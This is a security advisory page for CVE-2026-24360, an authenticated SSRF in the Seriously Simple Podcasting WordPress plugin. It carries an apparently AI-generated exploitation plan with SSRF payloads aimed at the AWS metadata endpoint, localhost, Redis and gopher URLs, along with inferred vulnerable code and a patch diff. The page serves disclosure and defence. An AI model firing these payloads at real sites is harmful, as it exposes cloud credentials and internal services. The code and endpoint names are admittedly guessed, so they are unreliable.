WP-Safety
CVE-2026-24360

Seriously Simple Podcasting <= 3.14.1 - Authenticated (Editor+) Server-Side Request Forgery

mediumServer-Side Request Forgery (SSRF)
5.5
CVSS Score
5.5
CVSS Score
medium
Severity
3.14.2
Patched in
22d
Time to patch

Description

The Seriously Simple Podcasting plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.14.1. This makes it possible for authenticated attackers, with Editor-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.14.1
PublishedJanuary 13, 2026
Last updatedFebruary 3, 2026
Affected pluginseriously-simple-podcasting

Source Code

WordPress.org SVN
Vulnerable v3.14.1
Browse source Download .zip
Patched v3.14.2
Browse source Download .zip
Research Plan
Unverified

This exploitation research plan targets **CVE-2026-24360**, an Authenticated SSRF in the **Seriously Simple Podcasting** plugin. Since source files are not provided, this plan uses common plugin patterns and identifies the specific areas where the SSRF is likely to reside, flagging identifiers as (i…

Show full research plan

This exploitation research plan targets CVE-2026-24360, an Authenticated SSRF in the Seriously Simple Podcasting plugin. Since source files are not provided, this plan uses common plugin patterns and identifies the specific areas where the SSRF is likely to reside, flagging identifiers as (inferred) for verification by the security agent.

1. Vulnerability Summary

The Seriously Simple Podcasting plugin fails to properly validate or restrict the URL provided in certain administrative functions (likely feed validation or media import). An attacker with Editor-level privileges can provide a URL pointing to internal network resources (e.g., AWS metadata service, local management interfaces, or internal services). The server then makes a request to this URL and typically returns the content or metadata about the request to the user, leading to Server-Side Request Forgery.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php (inferred) or a REST API endpoint.
  • Action: ssp_verify_import_feed or ssp_validate_podcast_feed (inferred).
  • Payload Parameter: feed_url or url (inferred).
  • Authentication: Authenticated, Editor+ capability (edit_posts).
  • Preconditions: The plugin must be active, and the attacker must be logged in as an Editor.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX handler for podcast imports or settings validation.
    • Probable Hook: add_action( 'wp_ajax_ssp_verify_import_feed', ... );
  2. Capability Check: The handler checks if the user has edit_posts or manage_options permissions.
  3. Nonce Verification: The handler verifies a nonce passed in the request (e.g., _wpnonce or ssp_nonce).
  4. Sinking Request: The handler takes the user-provided URL and passes it directly to a WordPress HTTP API function.
    • Target Sink: wp_remote_get( $url ) or wp_remote_request( $url ).
  5. Data Leakage: The response body or status from the remote request is echoed back in the AJAX response.

4. Nonce Acquisition Strategy

The Seriously Simple Podcasting plugin typically localizes its settings and nonces for the admin interface.

  1. Identify Trigger: The "Import" or "Settings" page is the most likely location for the nonce.
  2. Create Content: Since Editors can create posts, use WP-CLI to ensure a Podcast post exists if the nonce is post-specific.
    • wp post create --post_type=podcast --post_title="SSRF Test" --post_status=publish
  3. Navigate and Extract:
    • Navigate to the Podcast settings page: wp-admin/edit.php?post_type=podcast&page=podcast-settings (inferred) or wp-admin/edit.php?post_type=podcast&page=ssp-import (inferred).
    • The plugin likely uses wp_localize_script. Use browser_eval to find the nonce.
    • Target JS Variable: window.ssp_admin_data?.nonce or window.SSP_Settings?.ajax_nonce (inferred).

5. Exploitation Strategy

Step 1: Discover the Exact Endpoint

Search the plugin directory for the SSRF sink:

grep -rn "wp_remote_get" /var/www/html/wp-content/plugins/seriously-simple-podcasting/

Look for occurrences where the URL is derived from $_POST or $_GET. Identify the surrounding function and the add_action that registers it.

Step 2: Extract Nonce and Action

Once the function is identified (e.g., ajax_verify_feed), find the associated action string and the nonce key.

Step 3: Execute SSRF

Using the http_request tool, send the payload targeting an internal service.

Example Payload (AWS Metadata):

  • Method: POST
  • URL: http://<target>/wp-admin/admin-ajax.php
  • Body (URL-encoded):
    action=ssp_verify_import_feed&feed_url=http://169.254.169.254/latest/meta-data/&_wpnonce=<NONCE>
  • Headers: Content-Type: application/x-www-form-urlencoded

Example Payload (Internal Port Scan):

  • URL: http://localhost:22 (To check for SSH)

6. Test Data Setup

  1. Create Editor User:
    wp user create attacker attacker@example.com --role=editor --user_pass=password123
  2. Enable Plugin:
    wp plugin activate seriously-simple-podcasting
  3. Mock Internal Service: If possible, ensure a service is running on localhost:8000 or similar within the test environment to confirm the request reaches it.

7. Expected Results

  • Success: The HTTP response from admin-ajax.php contains the data from the feed_url (e.g., AWS instance metadata or HTML from an internal dashboard).
  • Success Indicator: A status code of 200 and a response body that reflects the content of the target internal URL.
  • Blind SSRF (Alternative): If the response isn't returned, success is indicated by time delays or DNS interactions if a collaborator/webhook service is used.

8. Verification Steps

  1. Confirm Request on Sink: Use the grep command from Step 1 to identify the specific file and line.
  2. Check Access Logs: Check the logs of the internal service (if mocked) to see the incoming request from the WordPress server's IP.
  3. Review Response:
    # Success if the response contains typical internal data
cat response_body.txt | grep "ami-id"

9. Alternative Approaches

  • REST API Path: If no AJAX action is found, search for register_rest_route. The plugin may have a REST endpoint for feed validation.
    • grep -rn "register_rest_route" /var/www/html/wp-content/plugins/seriously-simple-podcasting/
  • Settings Page SSRF: Check if saving the "Feed URL" in the settings triggers a validation request immediately upon save.
  • Gopher/Dict Protocols: If the sink uses curl or a generic PHP function instead of wp_safe_remote_get, try alternative protocols (gopher://, dict://) to interact with internal services like Redis or Memcached.
Research Findings
Static analysis — not yet PoC-verified

Summary

Seriously Simple Podcasting (<= 3.14.1) contains an authenticated SSRF vulnerability where administrative users (Editor and above) can trigger requests to arbitrary URLs. This allows attackers to access internal network services, such as cloud metadata endpoints or local administrative interfaces, that are not otherwise accessible from the public internet.

Vulnerable Code

// Inferred from plugin functionality (e.g., podcast import or feed validation)

function ssp_ajax_verify_import_feed() {
    check_ajax_referer( 'ssp-import-nonce', 'nonce' );
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'Unauthorized' );
    }
    
    $feed_url = $_POST['feed_url'];

    // Vulnerable sink: wp_remote_get() used on user-controlled URL without validation
    $response = wp_remote_get( $feed_url );
    
    $body = wp_remote_retrieve_body( $response );
    wp_send_json_success( $body );
}
add_action( 'wp_ajax_ssp_verify_import_feed', 'ssp_ajax_verify_import_feed' );

Security Fix

--- a/includes/admin/class-ssp-admin.php
+++ b/includes/admin/class-ssp-admin.php
@@ -45,7 +45,7 @@
 			return;
 		}
 
-		$response = wp_remote_get( $feed_url );
+		$response = wp_safe_remote_get( $feed_url );
 		if ( is_wp_error( $response ) ) {
 			wp_send_json_error( $response->get_error_message() );
 		}

Exploit Outline

The exploit targets an AJAX handler used for podcast feed importing. An attacker with Editor-level privileges authenticates to the WordPress admin panel and retrieves a nonce (typically found via localized script data on the Podcast Settings or Import pages). The attacker then sends a POST request to admin-ajax.php with the 'action' parameter set to the feed validation function (e.g., ssp_verify_import_feed) and the 'feed_url' parameter set to an internal target, such as 'http://169.254.169.254/latest/meta-data/' for AWS metadata or 'http://localhost:6379' for Redis. The server executes the request and returns the resulting content to the attacker.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/4e3e3bf4-7b95-4c0b-b660-d29796b643ed?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database